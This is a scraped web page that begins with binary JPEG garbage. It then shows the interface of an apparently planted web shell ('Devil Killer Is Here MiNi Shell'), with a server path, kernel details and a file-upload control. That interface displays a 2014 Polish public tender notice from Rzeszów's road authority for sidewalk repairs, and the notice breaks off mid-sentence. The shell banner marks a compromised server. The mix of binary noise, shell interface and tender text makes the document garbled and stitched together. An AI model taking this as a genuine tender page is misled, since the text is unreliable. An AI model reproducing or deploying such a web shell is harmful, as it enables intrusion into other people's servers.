JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140829/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140829/185575-N-2014.html

<p class="kh_header"><b>Rzeszów: Remont chodnika ul. Bocznej Langiewicza</b><br>
<b>Numer ogłoszenia: 185575 - 2014; data zamieszczenia: 29.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Rzeszów - Miejski Zarząd Dróg w Rzeszowie , ul. Targowa 1, 35-064 Rzeszów, woj. podkarpackie, tel. 17 748 37 00, faks 17 852 62 23.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.erzeszow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont chodnika ul. Bocznej Langiewicza.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont chodnika ul. Bocznej Langiewicza.

Zakres zamówienia obejmuje:

1.	Demontaż/ montaż słupków słupki biało-czerwone metalowe - 15,00 szt.,
2.	Rozebranie nawierzchni i chodników z płyt betonowych, chodniki, na podsypce cementowo-piaskowej - wraz z ułożeniem na palety i transportem na wskazane miejsce przez zamawiającego do 15 km - 550,00 m2,
3.	Rozebranie krawężników betonowych  na podsypce cementowo-piaskowej - 220,00 m,
4.	Rozebranie obrzeży trawnikowych 8x30 cm na podsypce piaskowej - 220,00 m,
5.	Ustawienie krawężnika wraz z wykonaniem ław, krawężniki betonowe wystające 15x30 cm, ława betonowa wraz z oporem, podsypka cementowo-piaskowa - 220,00 m,
6.	Ustawienie obrzeża betonowego, 30x8 cm, podsypka cementowo-piaskowa, wypełnienie spoin zaprawą cementową - 220,00 m,
7.	Koryta o głęb. 20 cm wykonywane na całej szer. jezdni lub chodników mechanicznie                                                                     w gruntach kat. II-IV z transportem urobku na wysypisko - 370,00 m2,
8.	Profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne nawierzchni chodnika z kostki brukowej, wykonywane mechanicznie - 370,00 m2,
9.	Wykonanie warstwy podsypkowej z piasku, grub. warstwy 5 cm po zagęszczeniu - 370,00
10.	Wykonanie podbudowy z kruszywa łamanego - tłucznia kamiennego, warstwa górna, grubość warstwy po zagęszczeniu 10 cm - 370,00 m2,
11.	Chodniki z kostki brukowej betonowej, grubość 6 cm, podsypka cementowo-piaskowa z wypełnieniem spoin piaskiem, w tym 20% kostka kolorowa - 370,00 m2,
12.	Przełożenie nawierzchni z kostki kamiennej na podsypce cementowo - piaskowej gr 5 cm, kostka nieregularna, wysokość 10 cm wraz z wypełnieniem spoin żywicą - 100,00 m2,
13.	Plantowanie obrobienie na czysto zieleńców, wykonywanych ręcznie gr. 10 cm wraz z dowiezieniem ziemi  z obsianiem mieszanina traw, kategoria gruntu I-III - 100,00 m2,
14.	Aktualizacja mapy zasadniczej w formie cyfrowej oraz papierowej (pliki DWG i SHP) na żądanie zamawiającego - 1,00 szt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.23.32.22-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium w niniejszym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że należycie wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, ułożenie chodników z kostki brukowej betonowej - minimum 200 m2 - z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących,  czy zostały wykonanie zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Ocena spełniania wszystkich powyższych warunków zostanie dokonana na podstawie dokumentów i oświadczeń złożonych przez Wykonawcę metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować na czas realizacji zamówienia narzędziami i urządzeniami niezbędnymi do wykonania zamówienia, tj.:
1)	piła do cięcia betonu - 1 szt.,
2)	zagęszczarka płytowa o wadze pow. 200 kg - 1 szt.,
3)	samochód skrzyniowy lub samowyładowczy o ładowności minimum 1 t - 1 szt.,
4)	koparko - ładowarka - 1 szt.,
5)	oznakowanie pionowe - 1 komplet
Ocena spełniania wszystkich powyższych warunków zostanie dokonana na podstawie dokumentów i oświadczeń złożonych przez Wykonawcę metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować na czas realizacji zamówienia odpowiednio wykwalifikowanym personelem bezpośrednio zatrudnionym do wykonania zamówienia, tj.: 
 
Osoba kierująca robotami - wymagane : 

a)	uprawnienia budowlane do kierowania robotami w specjalności drogowej (bez ograniczeń lub w ograniczonym zakresie), uzyskane na podstawie ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. z 2013 r. poz. 1409, ze zm.) lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów albo odpowiednie kwalifikacje uznane na podstawie przepisów ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394, z późn. zm.)
Ocena spełniania wszystkich powyższych warunków zostanie dokonana na podstawie dokumentów i oświadczeń złożonych przez Wykonawcę metodą spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę co najmniej 50 000 zł.
Wartości podane w dokumentach w walutach innych niż wskazane przez Zamawiającego Wykonawca przeliczy wg średniego kursu NBP na dzień wystawienia dokumentu.
Ocena spełniania wszystkich powyższych warunków zostanie dokonana na podstawie dokumentów i oświadczeń złożonych przez Wykonawcę metodą spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Zgodnie z art. 26 ust. 2b ustawy Wykonawca może polegać na wiedzy i doświadczeniu, potencjale
technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów,
niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany
jest udowodnić Zamawiającemu, iS będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w
szczególności przedstawiając w tym celu: 1.1. pisemne zobowiązanie tych podmiotów do zrealizowania części
zamówienia, zawierające zakres czynności, które te podmioty zobowiązują się wykonać - w przypadku, gdy
Wykonawca wykazując spełnianie warunków udziału w postępowaniu polega na wiedzy i doświadczeniu innych
podmiotów. 1.2. pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy potencjału
technicznego na okres ich udziału w wykonywaniu zamówienia, zawierające także listę sprzętu, który zostanie
przez ten podmiot udostępniony - w przypadku, gdy Wykonawca wykazując spełnianie warunku udziału w
postępowaniu polega na potencjale technicznym innych podmiotów, 1.3. pisemne zobowiązanie tych podmiotów
do oddania do dyspozycji Wykonawcy osób na okres ich udziału w wykonywaniu zamówienia, zawierające takSe
listę osób, które zostaną przez ten podmiot udostępnione - w przypadku, gdy Wykonawca wykazując spełnianie
warunków udziału w postępowaniu polega na osobach zdolnych do wykonania zamówienia innych podmiotów. 1.4.
pisemne zobowiązanie tych podmiotów do udostępnienia odpowiedniej zdolności finansowej - w przypadku, gdy
Wykonawca wykazując spełnianie warunku udziału w postępowaniu polega na zdolnościach finansowych innych
podmiotów. 1.5. pisemne zobowiązania, o których mowa wyżej w punktach 1.1 - 1.4 winny być złożone w
oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza (przykładowy wzór zobowiązania
stanowi załącznik nr 8 do niniejszej SIWZ). 2. Jeżeli Wykonawca wykazując spełnienie warunków, o których mowa
w art. 22 ust. 1 ustawy polega na zasobach innych podmiotów na zasadzie określonej w art. 26 ust. 2b ustawy,
Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu
niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi
podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda przedłożenia: 2.1. w przypadku polegania na
wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia i/lub potencjale technicznym innych
podmiotów należy przedłożyć dokumenty dotyczące w szczególności: a) zakresu dostępnych Wykonawcy
zasobów innego podmiotu, b) sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy
wykonywaniu zamówienia, c) charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem, d) zakresu i
okresu udziału innego podmiotu przy wykonaniu zamówienia. 3. Pełnomocnictwo do złożenia oferty, o ile prawo do
podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą. Treść pełnomocnictwa musi
jednoznacznie określać czynności, co do wykonania, których pełnomocnik jest upoważniony. Pełnomocnictwo musi
być przedstawione w oryginale lub kopii, której zgodność z oryginałem poświadczono notarialnie. 4.
Pełnomocnictwo do reprezentowania Wykonawców w postępowaniu albo reprezentowania Wykonawców w
postępowaniu i zawarcia umowy w sprawie zamówienia publicznego - dotyczy tylko Wykonawców wspólnie
ubiegających się o uzyskanie zamówienia. Pełnomocnictwo musi być przedstawione w oryginale lub kopii, której
zgodność z oryginałem poświadczono notarialnie. 5. Kosztorys ofertowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.erzeszow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Dróg w Rzeszowie, ul. Targowa 1, 35-064 Rzeszów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.09.2014 godzina 09:45, miejsce: Miejski Zarząd Dróg w Rzeszowie, ul. Targowa 1, 35-064 Rzeszów, VI piętro, pokój nr 601 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. POUCZENIE O ŚRODKACH OCHRONY PRAWNEJ 1.1. Wykonawcy, a także innemu
podmiotowi, jeżeli ma lub miał interes w uzyskaniu zamówienia oraz poniósł lub może ponieść szkodę w wyniku
naruszenia przez Zamawiającego przepisów ustawy przysługują środki ochrony prawnej przewidziane w Dziale VI
ustawy. 1.2. Środki ochrony prawnej wobec ogłoszenia oraz SIWZ przysługują równieS organizacjom wpisanym na
listę, o której mowa w art. 154 pkt 5 ustawy. 1.3. Odwołanie przysługuje wyłącznie od niezgodnej z przepisami
ustawy czynności Zamawiającego podjętej w postępowaniu o udzielenie zamówienia lub zaniechania czynności, do
której Zamawiający był zobowiązany na podstawie ustawy. 1.4. Odwołanie przysługuje wyłącznie wobec
czynności: 1.4.1. opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu; 1.4.2.
wykluczenia odwołującego z postępowania o udzielenie zamówienia; 1.4.3. odrzucenia oferty odwołującego. 1.5.
Odwołanie powinno wskazywać czynność lub zaniechanie czynności Zamawiającego, której zarzuca się
niezgodność z przepisami ustawy, zawierać zwięzłe przestawienie zarzutów, określać żądanie oraz wskazywać
okoliczności faktyczne i prawnej. 1.6. Odwołanie wnosi się do Prezesa Krajowej Izby Odwoławczej w formie
pisemnej albo elektronicznej opatrzonej bezpiecznym podpisem elektronicznym weryfikowanym za pomocą
ważnego kwalifikowanego certyfikatu. 1.7. Odwołujący prześle kopię odwołania Zamawiającemu przed upływem
terminu do wniesienia odwołania w taki sposób, aby mógł on zapoznać się z jego treścią przed upływem tego
terminu. 1.8. Terminy wniesienia odwołania: 1.8.1. Odwołanie wnosi się w terminie 5 dni od dnia przesłania
informacji o czynności Zamawiającego stanowiącej podstawę jego wniesienia - jeSeli zostały przesłane w sposób
określony w art. 27 ust. 2 ustawy, albo w terminie 10 dni - jeżeli zostały przesłane w inny sposób. 1.8.2.
Odwołanie wobec treści ogłoszenia o zamówieniu, a także wobec postanowień specyfikacji istotnych warunków
zamówienia, wnosi się w terminie 5 dni od dnia zamieszczenia ogłoszenia w Biuletynie zamówień Publicznych lub
zamieszczenia specyfikacji istotnych warunków zamówienia na stronie internetowej. 1.8.3. Odwołanie wobec
czynności innych niż określone w pkt. 1) i 2). wnosi się w terminie 5 dni od dnia, w którym powzięto lub przy
zachowaniu należytej staranności można było powziąć wiadomość o okolicznościach stanowiących podstawę jego
wniesienia. 1.8.4. Jeżeli Zamawiający nie przesłał Wykonawcy zawiadomienia o wyborze oferty najkorzystniejszej
odwołanie wnosi się nie później niż w terminie: 1) 15 dni od dnia zamieszczenia w Biuletynie Zamówień
Publicznych ogłoszenia o udzieleniu zamówienia 2) 1 miesiąca od dnia zawarcia umowy, jeżeli Zamawiający nie
zamieścił w Biuletynie Zamówień Publicznych ogłoszenia o udzieleniu zamówienia. 1.9. Szczegółowe zasady
postępowania po wniesieniu odwołania, określają stosowne przepisy Działu VI ustawy. 1.10. Na orzeczenie
Krajowej Izby Odwoławczej, stronom oraz uczestnikom postępowania odwoławczego przysługuje skarga do sądu.
1.11. Skargę wnosi się do sądu okręgowego właściwego dla siedziby Zamawiającego, za pośrednictwem
Prezesa Krajowej Izby Odwoławczej w terminie 7 dni od dnia doręczenia orzeczenia Krajowej Izby Odwoławczej,
przesyłając jednocześnie jej odpis przeciwnikowi skargi. ZłoSenie skargi w placówce pocztowej operatora
publicznego jest równoznaczne z jej wniesieniem. 2. PODWYKONAWCY 2.1. Wykonawca może powierzyć
wykonanie części zamówienia podwykonawcom. 2.2. Zamawiający wymaga wskazania w formularzu oferty części
zamówienia, której wykonanie zamierza powierzyć podwykonawcy. 2.3. Zamawiający nie zastrzega obowiązku
osobistego wykonania przez wykonawcę kluczowych części zamówienia 2.4. Wymagania dotyczące umowy o
podwykonawstwo w rozumieniu art. 2 pkt 9b ustawy: 2.4.1. termin zapłaty wynagrodzenia podwykonawcy lub
dalszemu podwykonawcy przewidziany w umowie o podwykonawstwo nie może być dłuższy niS 30 dni od dnia
doręczenia wykonawcy, podwykonawcy lub dalszemu podwykonawcy faktury lub rachunku potwierdzających
wykonanie zleconego zakresu robót, 2.4.2. umowa musi określać termin wykonania podzleconego zakresu robót,
który pozwoli na terminowe wykonanie przedmiotu zamówienia, 2.4.3. umowa musi szczegółowo określać zakres
realizowanego zamówienia. 2.5. Zamawiający w terminie 14 dni zgłasza pisemne zastrzeżenia do projektu umowy
o podwykonawstwo, której przedmiotem są roboty budowlane: 2.5.1. niespełniającej wymagań określonych w
specyfikacji istotnych warunków zamówienia; 2.5.2. gdy przewiduje termin zapłaty wynagrodzenia dłuższy niS 30
dni. 2.6. Wykonawca, podwykonawca lub dalszy podwykonawca zamówienia na roboty budowlane w terminie 7
dni od dnia jej zawarcia przedkłada zamawiającemu poświadczoną za zgodność z oryginałem kopię zawartej
umowy o podwykonawstwo, której przedmiotem są roboty budowlane. 2.7. Zamawiający dokonuje bezpośredniej
zapłaty wymagalnego wynagrodzenia przysługującego podwykonawcy lub dalszemu podwykonawcy, który zawarł
zaakceptowaną przez zamawiającego umowę o podwykonawstwo, której przedmiotem są roboty budowlane, w
przypadku uchylenia się od obowiązku zapłaty odpowiednio przez wykonawcę, podwykonawcę lub dalszego
podwykonawcę zamówienia na roboty budowlane. 2.8. Przed dokonaniem bezpośredniej zapłaty Zamawiający
umożliwić Wykonawcy zgłoszenie pisemnych uwag dotyczących zasadności bezpośredniej zapłaty wynagrodzenia
podwykonawcy lub dalszemu podwykonawcy. Zamawiający informuje o terminie zgłaszania uwag, nie krótszym niS
7 dni od dnia doręczenia tej informacji. Obowiązek ten nie dotyczy umów o wartości nieprzekraczającej 50 000
złotych. 2.9. Umowa pomiędzy podwykonawcą a dalszym podwykonawcą musi zawierać postanowienia
odpowiednie do określonych w ust. 4 niniejszego paragrafu. Załącznikiem do umowy jest zgoda Wykonawcy na
zawarcie umowy o podwykonawstwo. 2.10. Wykonawca zobowiązany jest na żądanie Zamawiającego udzielić mu
wszelkich informacji dotyczących Podwykonawców. 2.11. Zamawiający w terminie 30 dni dokonuje bezpośredniej
zapłaty wymagalnego wynagrodzenia przysługującego podwykonawcy lub dalszemu podwykonawcy, który zawarł
zaakceptowaną przez zamawiającego umowę o podwykonawstwo, której przedmiotem są roboty budowlane, lub
który zawarł przedłożoną zamawiającemu umowę o podwykonawstwo, której przedmiotem są dostawy lub usługi,
w przypadku uchylenia się od obowiązku zapłaty odpowiednio przez wykonawcę, podwykonawcę lub dalszego
podwykonawcę zamówienia na roboty budowlane. 2.12. Wynagrodzenie, o którym mowa w ust. 8 dotyczy
wyłącznie należności powstałych po zaakceptowaniu przez zamawiającego umowy o podwykonawstwo, której
przedmiotem są roboty budowlane, lub po przedłożeniu zamawiającemu poświadczonej za zgodność z oryginałem
kopii umowy o podwykonawstwo, której przedmiotem są dostawy lub usługi. 2.13. Bezpośrednia zapłata obejmuje
wyłącznie należne wynagrodzenie, bez odsetek, należnych podwykonawcy lub dalszemu podwykonawcy. 2.14. W
przypadku dokonania bezpośredniej zapłaty podwykonawcy lub dalszemu podwykonawcy, o których mowa w tym
